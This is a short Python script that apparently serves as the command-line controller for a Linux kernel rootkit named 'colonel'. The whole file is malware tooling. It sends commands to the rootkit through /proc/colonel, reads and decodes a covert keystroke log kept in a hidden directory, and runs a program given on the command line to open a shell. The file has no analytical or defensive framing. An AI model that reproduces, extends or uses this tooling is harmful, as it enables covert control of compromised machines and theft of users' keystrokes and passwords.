#!/usr/bin/env python
# Sends commands to the rootkit.
import os
import sys
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + 'irc'))
import key
from os import getpid, execl

evlog = "/opt/__col_log/evlog.txt"


# Opens and writes commands to /proc/colonel.
def command(c):
	f = open("/proc/colonel", "w")
	f.write(c)
	f.close()


# Translate and print the keylog to console.
def keylogs():
	log = open(evlog, 'r')
	f = log.read()
	log.close()
	kl = key.translate(f)
	print kl


def main():
	if len(sys.argv[:]) <= 1 or os.geteuid() != 0:
		print "usage: sudo %s <command>" % sys.argv[0]
	# will open a shell given the correct command.
	elif len(sys.argv[:]) > 2:
		execl(sys.argv[2], "")
	elif len(sys.argv[:]) > 1:
		if sys.argv[1] == "keylog":
			keylogs()
		else:
			command(sys.argv[1])


if __name__ == "__main__":
	main()

